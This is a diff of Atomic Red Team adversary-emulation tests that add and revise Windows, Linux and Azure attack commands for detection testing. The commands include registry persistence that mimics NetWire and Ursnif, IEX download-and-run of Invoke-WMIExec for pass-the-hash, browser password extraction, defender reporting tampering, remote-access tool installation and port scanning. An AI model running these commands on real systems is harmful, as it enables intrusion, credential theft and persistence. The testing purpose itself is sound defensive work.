   - Atomic Test #7: RemotePC Software Execution [windows]
+  - Atomic Test #8: NetSupport - RAT Execution [windows]
 - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -10555,6 +10555,105 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: NetWire RAT Registry Key Creation
+      auto_generated_guid: 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+      description: |
+        NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+        See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+          reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+          reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+        cleanup_command: |
+          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+          reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+          reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Ursnif Malware Registry Key Creation
+      auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
+      description: |
+        Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+        More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4
+          /v comsxRes /t REG_BINARY  /d 72656463616e617279 /f
+
+          '
+        cleanup_command: |
+          reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+          reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Terminal Server Client Connection History Cleared
+      auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
+      description: 'The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe)
+        saves the remote computer name (or IP address) and the username that is used
+        to login after each successful connection to the remote computer
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "Must have the \"MR9\" Remote Desktop Connection history Key
+          \n"
+        prereq_command: 'if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal
+          Server Client\Default\").MR9) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client"  -ErrorAction Ignore
+          New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+          New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1"  -PropertyType "String" -ErrorAction Ignore
+          New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+          New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+      executor:
+        command: |
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Error Reporting Settings
+      auto_generated_guid: d2c9e41e-cd86-473d-980d-b6403562e3e1
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to disable windows error reporting settings. This Windows
+        feature allow the use to report bug, errors, failure or problems \nencounter
+        in specific application or process.\nSee how azorult malware abuses this technique-
+        https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+        cleanup_command: |
+          reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+          reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: DisallowRun Execution Of Certain Application
+      auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to prevent user running specific computer programs that could
+        aid them in manually removing malware or detecting it \nusing security product.\nSee
+        how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+        cleanup_command: |
+          reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+          reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
   T1574.008:
     technique:
       x_mitre_platforms:
@@ -12223,6 +12322,39 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: Odbcconf.exe - Load Response File
+      auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+      description: |
+        Execute arbitrary response file that will spawn PowerShell.exe.
+        Source files: https://github.com/woanware/application-restriction-bypasses
+      supported_platforms:
+      - windows
+      input_arguments:
+        rsp_file_name:
+          description: Response file name to load
+          type: String
+          default: T1218.008.rsp
+        rsp_file_path:
+          description: Response file path
+          type: String
+          default: PathToAtomicsFolder\T1218.008\bin\
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+
+          '
+        prereq_command: 'if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0}
+          else {exit 1}
+
+          '
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+      executor:
+        command: |
+          cd #{rsp_file_path}
+          odbcconf.exe -f #{rsp_file_name}
+        name: command_prompt
   T1144:
     technique:
       x_mitre_platforms:
@@ -23263,7 +23395,7 @@ defense-evasion:
       executor:
         command: |-
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+          IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
         name: powershell
   T1574.002:
     technique:
@@ -37337,12 +37469,17 @@ privilege-escalation:
           default: C:\Windows\System32\cmd.exe
       executor:
         command: |
+          reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
           copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
           shutdown /r /t 0
+        cleanup_command: |
+          reg import %userprofile%\backup.reg
+          del %userprofile%\backup.reg
+          del %SystemRoot%\System32\evilscreensaver.scr
         name: command_prompt
         elevation_required: true
   T1543.001:
@@ -44351,13 +44488,16 @@ execution:
         prereq_command: 'if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
 
           '
-        get_prereq_command: 'curl #{autosuid_url} --output #{autosuid}
+        get_prereq_command: 'curl --create-dirs #{autosuid_url} --output #{autosuid}
 
           '
       executor:
         command: |
           chmod +x #{autosuid}
           bash #{autosuid}
+        cleanup_command: 'rm -rf #{autosuid}
+
+          '
         name: sh
     - name: LinEnum tool execution
       auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
@@ -44386,13 +44526,16 @@ execution:
         prereq_command: 'if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
 
           '
-        get_prereq_command: 'curl #{linenum_url} --output #{linenum}
+        get_prereq_command: 'curl --create-dirs #{linenum_url} --output #{linenum}
 
           '
       executor:
         command: |
           chmod +x #{linenum}
           bash #{linenum}
+        cleanup_command: 'rm -rf #{linenum}
+
+          '
         name: sh
   T1559:
     technique:
@@ -45000,9 +45143,10 @@ execution:
           '
       executor:
         command: |-
-          python -c "import pty;pty.spawn('/bin/sh')"
+          which_python=$(which python || which python3 || which python2)
+          $which_python -c "import pty;pty.spawn('/bin/sh')"
           exit
-          python -c "import pty;pty.spawn('/bin/bash')"
+          $which_python -c "import pty;pty.spawn('/bin/bash')"
           exit
         name: bash
   T1569:
@@ -59472,12 +59616,17 @@ persistence:
           default: C:\Windows\System32\cmd.exe
       executor:
         command: |
+          reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
           copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
           shutdown /r /t 0
+        cleanup_command: |
+          reg import %userprofile%\backup.reg
+          del %userprofile%\backup.reg
+          del %SystemRoot%\System32\evilscreensaver.scr
         name: command_prompt
         elevation_required: true
   T1543.001:
@@ -64132,6 +64281,48 @@ collection:
           Invoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile "#{output_file}"
         cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
 
+          '
+        name: powershell
+    - name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+      auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
+      description: "Upon successful execution, this test will test for anonymous access
+        to Azure storage containers by invoking a web request and outputting the results
+        to a file. \nThe corresponding response could then be interpreted to determine
+        whether or not the resource/container exists, as well as other information.
+        \nSee https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
+        \    \n"
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        base_name:
+          description: Azure storage account name to test
+          type: String
+          default: T1530Test2
+        output_file:
+          description: File to output results to
+          type: String
+          default: "$env:temp\\T1530Test2.txt"
+        container_name:
+          description: Container name to search for (optional)
+          type: String
+          default: 
+        blob_name:
+          description: Blob name to search for (optional)
+          type: String
+          default: 
+      executor:
+        command: |
+          try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+          catch [system.net.webexception]
+          {if($_.Exception.Response -ne $null)
+          {$Response = $_.Exception.Response.GetResponseStream()
+          $ReadResponse = New-Object System.IO.StreamReader($Response)
+          $ReadResponse.BaseStream.Position = 0
+          $responseBody = $ReadResponse.ReadToEnd()}
+          else {$responseBody = "The storage account could not be anonymously accessed."}}
+          "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+
           '
         name: powershell
   T1074.002:
@@ -68322,7 +68513,7 @@ lateral-movement:
       executor:
         command: |-
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+          IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
         name: powershell
   T1021.001:
     technique:
@@ -72921,6 +73112,40 @@ credential-access:
           rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
           rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
         name: sh
+    - name: WebBrowserPassView - Credentials from Browser
+      auto_generated_guid: e359627f-2d90-4320-ba5e-b0f878155bbe
+      description: The following Atomic test utilizes WebBrowserPassView to extract
+        passwords from browsers on a Window system. WebBrowserPassView is an open
+        source application used to retrieve passwords stored on a local computer.
+        Recently noticed as a tool used in the BlackCat Ransomware.
+      supported_platforms:
+      - windows
+      input_arguments:
+        webbrowserpassview_path:
+          description: 'Path to the WebBrowserPassView executable '
+          type: String
+          default: PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if WebBrowserPassView.exe exists in the specified path
+          #{webbrowserpassview_path}
+
+          '
+        prereq_command: 'if (Test-Path #{webbrowserpassview_path}) {exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe
+          -OutFile #{webbrowserpassview_path}
+
+          '
+      executor:
+        command: |
+          Start-Process #{webbrowserpassview_path}
+          Start-Sleep -Second 4
+          Stop-Process -Name "WebBrowserPassView"
+        name: powershell
+        elevation_required: true
   T1557.003:
     technique:
       x_mitre_platforms:
@@ -74935,7 +75160,7 @@ credential-access:
       executor:
         command: |
           findstr /si pass *.xml *.doc *.txt *.xls
-          ls -R | select-string -Pattern password
+          ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
         name: powershell
     - name: Access unattend.xml
       auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3
@@ -78858,7 +79083,7 @@ discovery:
         computer_name:
           description: Name of remote system to query
           type: String
-          default: "$env:COMPUTERNAME"
+          default: "%COMPUTERNAME%"
       executor:
         command: 'query user /SERVER:#{computer_name}
 
@@ -80308,7 +80533,7 @@ discovery:
           '
         get_prereq_command: "sudo #{package_installer} \n"
       executor:
-        command: 'smbstatus --shares
+        command: 'sudo smbstatus --shares
 
           '
         name: bash
@@ -80883,6 +81108,70 @@ discovery:
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
           Invoke-Seatbelt -Command "-group=all"; pause
         name: powershell
+    - name: Azure Security Scan with SkyArk
+      auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+      description: "Upon successful execution, this test will utilize a valid read-only
+        Azure AD user's credentials to conduct a security scan and determine what
+        users exist in a given tenant, as well as identify any admin users. \nOnce
+        the test is complete, a folder will be output to the temp directory that contains
+        3 csv files which provide info on the discovered users. \nSee https://github.com/cyberark/SkyArk
+        \n"
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: 
+        password:
+          description: Azure AD password
+          type: String
+          default: T1082Az
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The SkyArk AzureStealth module must exist in $env:temp.
+
+          '
+        prereq_command: 'if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: 'invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1"
+          -outfile "$env:temp\AzureStealth.ps1"
+
+          '
+      - description: 'The AzureAD module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+          '
+      - description: 'The Az module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Force
+
+          '
+      executor:
+        command: "Import-Module $env:temp\\AzureStealth.ps1 -force      \n$Password
+          = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential
+          = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
+          \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD
+          -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n"
+        cleanup_command: |
+          $resultstime = Get-Date -Format "yyyyMMdd"
+          $resultsfolder = ("Results-" + $resultstime)
+          remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+        name: powershell
+        elevation_required: true
   T1010:
     technique:
       x_mitre_platforms:
@@ -84120,13 +84409,17 @@ discovery:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        host:
+          description: Host to scan.
+          type: String
+          default: 192.168.1.1
       executor:
-        command: |
-          for port in {1..65535};
-          do
-            echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
-          done
-        name: sh
+        command: 'for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port)
+          && echo port $port is open ; done
+
+          '
+        name: bash
     - name: Port Scan Nmap
       auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
       description: |
@@ -84179,7 +84472,7 @@ discovery:
           apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)\n"
       executor:
         command: |
-          nmap -sS #{network_range} -p #{port}
+          sudo nmap -sS #{network_range} -p #{port}
           telnet #{host} #{port}
           nc -nv #{host} #{port}
         name: sh
@@ -87541,6 +87834,41 @@ command-and-control:
           -Name \"RPCService\" -force -erroraction silentlycontinue\n"
         name: powershell
         elevation_required: true
+    - name: NetSupport - RAT Execution
+      auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75
+      description: "A recent trend by threat actors, once a foothold is established,
+        maintain long term persistence using third party remote services such as NetSupport
+        to provide the operator with access to the network using legitimate services.
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        NetSupport_Path:
+          description: Path to the NetSupport executable.
+          type: Path
+          default: "$env:temp\\T1219Setup.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'NetSupport must be downloaded and exist on the disk at the specified
+          location. (#{NetSupport_Path})
+
+          '
+        prereq_command: 'if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe"
+          -Destination "$env:temp\T1219Setup.exe" -dynamic
+
+          '
+      executor:
+        command: 'Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+
+          '
+        cleanup_command: 'Stop-Process -Name "client32" -force -erroraction silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: true
   T1079:
     technique:
       x_mitre_platforms:

atomics/T1046/T1046.md

@@ -41,15 +41,17 @@ Upon successful execution, sh will perform a network connection against a single
 
 
 
-
-#### Attack Commands: Run with `sh`! 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| host | Host to scan. | String | 192.168.1.1|
 
 
-```sh
-for port in {1..65535};
-do
-  echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
-done
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
 ```
 
 
@@ -86,7 +88,7 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
 
 
 ```sh
-nmap -sS #{network_range} -p #{port}
+sudo nmap -sS #{network_range} -p #{port}
 telnet #{host} #{port}
 nc -nv #{host} #{port}
 ```

atomics/T1046/T1046.yaml

@@ -10,13 +10,15 @@ atomic_tests:
   supported_platforms:
   - linux
   - macos
+  input_arguments:
+    host:
+      description: Host to scan.
+      type: String
+      default: 192.168.1.1
   executor:
     command: |
-      for port in {1..65535};
-      do
-        echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
-      done
-    name: sh
+      for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
+    name: bash
 - name: Port Scan Nmap
   auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
   description: |
@@ -61,7 +63,7 @@ atomic_tests:
       (which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
   executor:
     command: |
-      nmap -sS #{network_range} -p #{port}
+      sudo nmap -sS #{network_range} -p #{port}
       telnet #{host} #{port}
       nc -nv #{host} #{port}
     name: sh

atomics/T1059.004/T1059.004.md

@@ -121,6 +121,10 @@ chmod +x #{autosuid}
 bash #{autosuid}
 ```
 
+#### Cleanup Commands:
+```sh
+rm -rf #{autosuid}
+```
 
 
 
@@ -132,7 +136,7 @@ if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
-curl #{autosuid_url} --output #{autosuid}
+curl --create-dirs #{autosuid_url} --output #{autosuid}
 ```
 
 
@@ -168,6 +172,10 @@ chmod +x #{linenum}
 bash #{linenum}
 ```
 
+#### Cleanup Commands:
+```sh
+rm -rf #{linenum}
+```
 
 
 
@@ -179,7 +187,7 @@ if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
-curl #{linenum_url} --output #{linenum}
+curl --create-dirs #{linenum_url} --output #{linenum}
 ```
 
 

atomics/T1059.004/T1059.004.yaml

@@ -60,13 +60,14 @@ atomic_tests:
     prereq_command: |
       if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
-      curl #{autosuid_url} --output #{autosuid}
+      curl --create-dirs #{autosuid_url} --output #{autosuid}
   executor:
     command: |
       chmod +x #{autosuid}
       bash #{autosuid}
+    cleanup_command: |
+      rm -rf #{autosuid}
     name: sh
-
 - name: LinEnum tool execution
   auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
   description: |
@@ -89,9 +90,11 @@ atomic_tests:
     prereq_command: |
       if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
-      curl #{linenum_url} --output #{linenum}
+      curl --create-dirs #{linenum_url} --output #{linenum}
   executor:
     command: |
       chmod +x #{linenum}
       bash #{linenum}
-    name: sh
+    cleanup_command: |
+      rm -rf #{linenum}
+    name: sh

atomics/T1059.006/T1059.006.md

@@ -220,9 +220,10 @@ ID T1059.006. Adversaries may abuse Python commands and scripts for execution. P
 
 
 ```bash
-python -c "import pty;pty.spawn('/bin/sh')"
+which_python=$(which python || which python3 || which python2)
+$which_python -c "import pty;pty.spawn('/bin/sh')"
 exit
-python -c "import pty;pty.spawn('/bin/bash')"
+$which_python -c "import pty;pty.spawn('/bin/bash')"
 exit
 ```
 

atomics/T1059.006/T1059.006.yaml

@@ -164,8 +164,9 @@ atomic_tests:
           pip install requests
     executor:
       command: |-
-        python -c "import pty;pty.spawn('/bin/sh')"
+        which_python=$(which python || which python3 || which python2)
+        $which_python -c "import pty;pty.spawn('/bin/sh')"
         exit
-        python -c "import pty;pty.spawn('/bin/bash')"
+        $which_python -c "import pty;pty.spawn('/bin/bash')"
         exit
       name: bash

atomics/T1082/T1082.md

@@ -52,6 +52,8 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
 
 - [Atomic Test #22 - WinPwn - PowerSharpPack - Seatbelt](#atomic-test-22---winpwn---powersharppack---seatbelt)
 
+- [Atomic Test #23 - Azure Security Scan with SkyArk](#atomic-test-23---azure-security-scan-with-skyark)
+
 
 <br/>
 
@@ -729,4 +731,81 @@ Invoke-Seatbelt -Command "-group=all"; pause
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #23 - Azure Security Scan with SkyArk
+Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users. 
+Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users. 
+See https://github.com/cyberark/SkyArk
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | |
+| password | Azure AD password | String | T1082Az|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Import-Module $env:temp\AzureStealth.ps1 -force      
+$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+Connect-AzAccount -Credential $Credential
+Connect-AzureAD -Credential $Credential
+Scan-AzureAdmins -UseCurrentCred
+```
+
+#### Cleanup Commands:
+```powershell
+$resultstime = Get-Date -Format "yyyyMMdd"
+$resultsfolder = ("Results-" + $resultstime)
+remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The SkyArk AzureStealth module must exist in $env:temp.
+##### Check Prereq Commands:
+```powershell
+if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1"
+```
+##### Description: The AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+##### Description: The Az module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Force
+```
+
+
+
+
 <br/>

atomics/T1082/T1082.yaml

@@ -274,3 +274,54 @@ atomic_tests:
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
       Invoke-Seatbelt -Command "-group=all"; pause
     name: powershell
+- name: Azure Security Scan with SkyArk
+  auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+  description: |
+    Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users. 
+    Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users. 
+    See https://github.com/cyberark/SkyArk 
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: null
+    password:
+      description: Azure AD password
+      type: String
+      default: T1082Az
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The SkyArk AzureStealth module must exist in $env:temp.
+    prereq_command: |
+      if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1}
+    get_prereq_command: |
